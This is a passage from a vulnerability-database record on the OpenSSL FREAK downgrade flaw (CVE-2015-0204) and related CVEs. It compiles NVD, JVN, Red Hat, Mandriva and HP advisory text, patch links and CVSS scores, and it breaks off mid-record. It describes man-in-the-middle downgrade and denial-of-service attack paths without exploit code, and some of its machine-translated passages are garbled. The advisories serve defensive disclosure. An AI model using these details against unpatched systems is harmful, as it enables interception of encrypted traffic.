RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the \"FREAK\" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations. SSL/TLS Some implementations of export grade without intentional setting (512 Below bit ) of RSA Something accepts the key. Man-in-the-middle attacks against such software (man-in-the-middle attack) Is performed, the key used for encryption is decrypted, SSL/TLS The traffic content may be decrypted. this is\" FREAK It is also called \u201cattack\u201d. Algorithm downgrade (CWE-757) CWE-757: Selection of Less-Secure Algorithm During Negotiation (\u0027Algorithm Downgrade\u0027) https://cwe.mitre.org/data/definitions/757.html Incorrect cipher strength (CWE-326) CWE-326: Inadequate Encryption Strength https://cwe.mitre.org/data/definitions/326.html SSL/TLS Some implementations of export grade without intentional setting (512 Below bit ) of RSA Something accepts the key. If a man-in-the-middle attack is performed on such software, it is guided to use a weak key in the negotiation at the start of communication, and as a result, encrypted information may be decrypted. The discoverer has released detailed information about this matter. FREAK: Factoring RSA Export Keys https://www.smacktls.com/#freakMan-in-the-middle attacks (man-in-the-middle attack) By SSL/TLS The contents of the communication may be decrypted. OpenSSL is prone to security-bypass vulnerability. \nSuccessfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks. \n \n Use-after-free vulnerability in the d2i_ECPrivateKey function in\n crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r,\n 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote\n attackers to cause a denial of service (memory corruption and\n application crash) or possibly have unspecified other impact via a\n malformed Elliptic Curve (EC) private-key file that is improperly\n handled during import (CVE-2015-0209). \n \n The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before\n 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before\n 1.0.2a does not properly perform boolean-type comparisons, which allows\n remote attackers to cause a denial of service (invalid read operation\n and application crash) via a crafted X.509 certificate to an endpoint\n that uses the certificate-verification feature (CVE-2015-0286). \n \n The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL\n before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2\n before 1.0.2a does not reinitialize CHOICE and ADB data structures,\n which might allow attackers to cause a denial of service (invalid\n write operation and memory corruption) by leveraging an application\n that relies on ASN.1 structure reuse (CVE-2015-0287). \n \n The X509_to_X509_REQ function in crypto/x509/x509_req.c in OpenSSL\n before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2\n before 1.0.2a might allow attackers to cause a denial of service\n (NULL pointer dereference and application crash) via an invalid\n certificate key (CVE-2015-0288). \n \n The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before\n 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not\n properly handle a lack of outer ContentInfo, which allows attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) by leveraging an application that processes arbitrary PKCS#7\n data and providing malformed data with ASN.1 encoding, related to\n crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289). \n \n The SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before\n 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a allows remote\n attackers to cause a denial of service (s2_lib.c assertion failure and\n daemon exit) via a crafted CLIENT-MASTER-KEY message (CVE-2015-0293). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Web Server 2.1.1 security update\nAdvisory ID: RHSA-2016:1650-01\nProduct: Red Hat JBoss Web Server\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1650.html\nIssue date: 2016-08-22\nCVE Names: CVE-2014-3570 CVE-2015-0204 CVE-2016-2105 \n CVE-2016-2106 CVE-2016-3110 CVE-2016-5387 \n=====================================================================\n\n1. Summary:\n\nAn update is now available for Red Hat JBoss Web Server. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nThis release serves as a replacement for Red Hat JBoss Web Server 2.1.0,\nand includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.1\nRelease Notes, linked to in the References section, for information on the\nmost significant of these changes. \n\nSecurity Fix(es):\n\n* It was discovered that httpd used the value of the Proxy header from HTTP\nrequests to initialize the HTTP_PROXY environment variable for CGI scripts,\nwhich in turn was incorrectly used by certain HTTP client implementations\nto configure the proxy for outgoing HTTP requests. A remote attacker could\npossibly use this flaw to redirect HTTP requests performed by a CGI script\nto an attacker-controlled proxy via a malicious HTTP request. A malicious server could make a TLS/SSL\nclient using OpenSSL use a weaker key exchange method. (CVE-2015-0204)\n\n* An integer overflow flaw, leading to a buffer overflow, was found in the\nway the EVP_EncodeUpdate() function of OpenSSL parsed very large amounts of\ninput data. A remote attacker could use this flaw to crash an application\nusing OpenSSL or, possibly, execute arbitrary code with the permissions of\nthe user running that application. (CVE-2016-2105)\n\n* An integer overflow flaw, leading to a buffer overflow, was found in the\nway the EVP_EncryptUpdate() function of OpenSSL parsed very large amounts\nof input data. A remote attacker could use this flaw to crash an\napplication using OpenSSL or, possibly, execute arbitrary code with the\npermissions of the user running that application. (CVE-2016-2106)\n\n* It was discovered that it is possible to remotely Segfault Apache http\nserver with a specially crafted string sent to the mod_cluster via service\nmessages (MCMP). (CVE-2016-3110)\n\n* It was found that OpenSSL\u0027s BigNumber Squaring implementation could\nproduce incorrect results under certain special conditions. This flaw could\npossibly affect certain OpenSSL library functionality, such as RSA\nblinding. Note that this issue occurred rarely and with a low probability,\nand there is currently no known way of exploiting it. (CVE-2014-3570)\n\nRed Hat would like to thank Scott Geary (VendHQ) for reporting\nCVE-2016-5387; the OpenSSL project for reporting CVE-2016-2105 and\nCVE-2016-2106; and Michal Karm Babacek for reporting CVE-2016-3110. \nUpstream acknowledges Guido Vranken as the original reporter of\nCVE-2016-2105 and CVE-2016-2106. \n\n3. Solution:\n\nBefore applying the update, back up your existing Red Hat JBoss Web Server\ninstallation (including all applications and configuration files). \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\nRefer to the Red Hat JBoss Enterprise Web Server 2.1.1 Release Notes for a\nlist of non security related fixes. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1180184 - CVE-2015-0204 openssl: only allow ephemeral RSA keys in export ciphersuites (FREAK)\n1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results\n1326320 - CVE-2016-3110 mod_cluster: remotely Segfault Apache http server\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n1337151 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow [jbews-2.1.0]\n1337155 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow [jbews-2.1.0]\n1353755 - CVE-2016-5387 Apache HTTPD: sets environmental variable based on user supplied Proxy request header\n1358118 - CVE-2016-5387 Apache HTTPD: sets environmental variable based on user supplied Proxy request header [jbews-2.1.0]\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3570\nhttps://access.redhat.com/security/cve/CVE-2015-0204\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-3110\nhttps://access.redhat.com/security/cve/CVE-2016-5387\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver\u0026downloadType=distributions\u0026version=2.1.1\nhttps://access.redhat.com/documentation/en-US/Red_Hat_JBoss_Web_Server/2.1/html/2.1.1_Release_Notes/index.html\nhttps://access.redhat.com/site/documentation/\nhttps://access.redhat.com/site/documentation/en-US/JBoss_Enterprise_Web_Server/2/html-single/Installation_Guide/index.html\nhttps://access.redhat.com/security/vulnerabilities/httpoxy\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXuz/AXlSAg2UNWIIRAnGKAJ9OG0AmFsej7cbv8xXILF5Lo7krOACdHUkC\nVkvGRKSu76E7WPtB8TOdqyw=\n=7UQL\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nSoftpaq:\nhttp://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe\n\nEasy Update Via ThinPro / EasyUpdate (x86):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-\n4.4-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nVia ThinPro / EasyUpdate (ARM):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-\n4.4-armel.xar\n\nNote: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch\napplied, VMware cannot connect if security level is set to \"Refuse insecure\nconnections\". Updating VMware to the latest package on ftp.hp.com will solve\nthe problem. \n \n A memory leak can occur in the dtls1_buffer_record function under\n certain conditions. In particular this could occur if an attacker\n sent repeated DTLS records with the same sequence number but for the\n next epoch. The memory leak could be exploited by an attacker in a\n Denial of Service attack through memory exhaustion (CVE-2015-0206). \n \n When openssl is built with the no-ssl3 option and a SSL v3 ClientHello\n is received the ssl method would be set to NULL which could later\n result in a NULL pointer dereference (CVE-2014-3569). This effectively removes forward secrecy from\n the ciphersuite (CVE-2014-3572). A server could present\n a weak temporary key and downgrade the security of the session\n (CVE-2015-0204). \n \n An OpenSSL server will accept a DH certificate for client\n authentication without the certificate verify message. This\n only affects servers which trust a client certificate authority which\n issues certificates containing DH keys: these are extremely rare and\n hardly ever encountered (CVE-2015-0205). \n \n OpenSSL accepts several non-DER-variations of certificate signature\n algorithm and signature encodings. OpenSSL also does not enforce a\n match between the signature algorithm between the signed and unsigned\n portions of the certificate. By modifying the contents of the signature\n algorithm or the encoding of the signature, it is possible to change\n the certificate\u0026#039;s fingerprint. This does not allow an attacker to\n forge certificates, and does not affect certificate verification or\n OpenSSL servers/clients in any other way. It also does not affect\n common revocation mechanisms. Only custom applications that rely\n on the uniqueness of the fingerprint (e.g. certificate blacklists)\n may be affected (CVE-2014-8275). \n \n The updated packages have been upgraded to the 1.0.0p version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n https://www.openssl.org/news/secadv_20150108.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 08baba1b5ee61bdd0bfbcf81d465f154 mbs1/x86_64/lib64openssl1.0.0-1.0.0p-1.mbs1.x86_64.rpm\n 51198a2b577e182d10ad72d28b67288e mbs1/x86_64/lib64openssl-devel-1.0.0p-1.mbs1.x86_64.rpm\n aa34fd335001d83bc71810d6c0b14e85 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0p-1.mbs1.x86_64.rpm\n c8b6fdaba18364b315e78761a5aa0c1c mbs1/x86_64/lib64openssl-static-devel-1.0.0p-1.mbs1.x86_64.rpm\n fc67f3da9fcd1077128845ce85be93e2 mbs1/x86_64/openssl-1.0.0p-1.mbs1.x86_64.rpm \n ab8f672de2bf2f0f412034f89624aa32 mbs1/SRPMS/openssl-1.0.0p-1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFUr+PRmqjQ0CJFipgRAtFXAJ46+q0aetnJkb6I9RuYmX5xFeGx9wCgt1rb\nLHbCdAkBpYHYSuaUwpiAu1w=\n=ePa9\n-----END PGP SIGNATURE-----\n. \nHP SSL for OpenVMS: All versions prior to 1.4-502. \n\n HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the\nfollowing locations:\n\n - HP SSL for OpenVMS website:\n\n http://h71000.www7.hp.com/openvms/products/ssl/ssl.html\n\n - HP Support Center website:\n\n https://h20566.www2.hp.com/portal/site/hpsc/patch/home\n\n Note: Login using your HP Passport account. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04774019\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04774019\nVersion: 1\n\nHPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-08-24\nLast Updated: 2015-08-24\n\nPotential Security Impact: Remote unauthorized modification, unauthorized\naccess, or unauthorized disclosure of information. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Matrix\nOperating Environment. The vulnerabilities could be exploited remotely\nresulting in unauthorized modification, unauthorized access, or unauthorized\ndisclosure of information. \n\nReferences:\n\nCVE-2010-5107\nCVE-2013-0248\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2014-1692\nCVE-2014-3523\nCVE-2014-3569\nCVE-2014-3570\nCVE-2014-3571\nCVE-2014-3572\nCVE-2014-8142\nCVE-2014-8275\nCVE-2014-9427\nCVE-2014-9652\nCVE-2014-9653\nCVE-2014-9705\nCVE-2015-0204\nCVE-2015-0205\nCVE-2015-0206\nCVE-2015-0207\nCVE-2015-0208\nCVE-2015-0209\nCVE-2015-0231\nCVE-2015-0232\nCVE-2015-0273\nCVE-2015-0285\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0290\nCVE-2015-0291\nCVE-2015-0292\nCVE-2015-0293\nCVE-2015-1787\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2015-2134\nCVE-2015-2139\nCVE-2015-2140\nCVE-2015-2301\nCVE-2015-2331\nCVE-2015-2348\nCVE-2015-2787\nCVE-2015-3113\nCVE-2015-5122\nCVE-2015-5123\nCVE-2015-5402\nCVE-2015-5403\nCVE-2015-5404\nCVE-2015-5405\nCVE-2015-5427\nCVE-2015-5428\nCVE-2015-5429\nCVE-2015-5430\nCVE-2015-5431\nCVE-2015-5432\nCVE-2015-5433\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Matrix Operating Environment impacted software components and versions:\n\nHP Systems Insight Manager (SIM) prior to version 7.5.0\nHP System Management Homepage (SMH) prior to version 7.5.0\nHP Version Control Agent (VCA) prior to version 7.5.0\nHP Version Control Repository Manager (VCRM) prior to version 7.5.0\nHP Insight Orchestration prior to version 7.5.0\nHP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3\nCVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9\nCVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the\nvulnerabilities in the impacted versions of HP Matrix Operating Environment\n\nHP Matrix Operating Environment 7.5.0 is only available on DVD. Please order\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\nfrom the following location:\n\nhttp://www.hp.com/go/insightupdates\n\nChoose the orange Select button. This presents the HP Insight Management\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\nthe Software specification list. Fill out the rest of the form and submit it. \n\nHP has addressed these vulnerabilities for the affected software components\nbundled with the HP Matrix Operating Environment in the following HP Security\nBulletins. \n\nHP Matrix Operating Environment component\n HP Security Bulletin Number\n Security Bulletin Location\n\nHP Systems Insight Manager (SIM)\n HPSBMU03394\n HPSBMU03394\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744\n\nHP System Management Homepage (SMH)\n HPSBMU03380\n http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490\u0026la\nng=en-us\u0026cc=\n\nHP Version Control Agent (VCA)\n HPSBMU03397\n https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169\n\nHP Version Control Repository Manager (VCRM)\n HPSBMU03396\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04765115\n\nHP Virtual Connect Enterprise Manager (VCEM) SDK\n HPSBMU03413\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04774021\n\nHISTORY\nVersion:1 (rev.1) - 24 August 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. These vulnerabilities could be exploited remotely to create a remote\nDenial of Service (DoS) and other vulnerabilites. \n\nReferences:\n\nCVE-2014-8275 Cryptographic Issues (CWE-310)\nCVE-2014-3569 Remote Denial of Service (DoS)\nCVE-2014-3570 Cryptographic Issues (CWE-310)\nCVE-2014-3571 Remote Denial of Service (DoS)\nCVE-2014-3572 Cryptographic Issues (CWE-310)\nCVE-2015-0204 Cryptographic Issues (CWE-310)\nSSRT101885\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The\nupdates are available from either of the following sites:\n\nftp://sl098ze:Secure12@h2.usa.hp.com\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=OPENSSL11I\n\nHP-UX Release\n HP-UX OpenSSL depot name\n\nB.11.11 (11i v1)\n OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot\n\nB.11.23 (11i v2)\n OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (11i v3)\n OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08ze or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant", "sources": [ { "db": "NVD", "id": "CVE-2015-0204" }, { "db": "CERT/CC", "id": "VU#243585" }, { "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "db": "BID", "id": "71936" }, { "db": "VULMON", "id": "CVE-2015-0204" }, { "db": "PACKETSTORM", "id": "131045" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "138473" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "130545" } ], "trust": 4.23 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-0204", "trust": 3.7 }, { "db": "CERT/CC", "id": "VU#243585", "trust": 1.6 }, { "db": "JVN", "id": "JVNVU99125992", "trust": 1.6 }, { "db": "BID", "id": "71936", "trust": 1.4 }, { "db": "JUNIPER", "id": "JSA10679", "trust": 1.4 }, { "db": "BID", "id": "91787", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10102", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10108", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10110", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033378", "trust": 1.1 }, { "db": "JVNDB", "id": 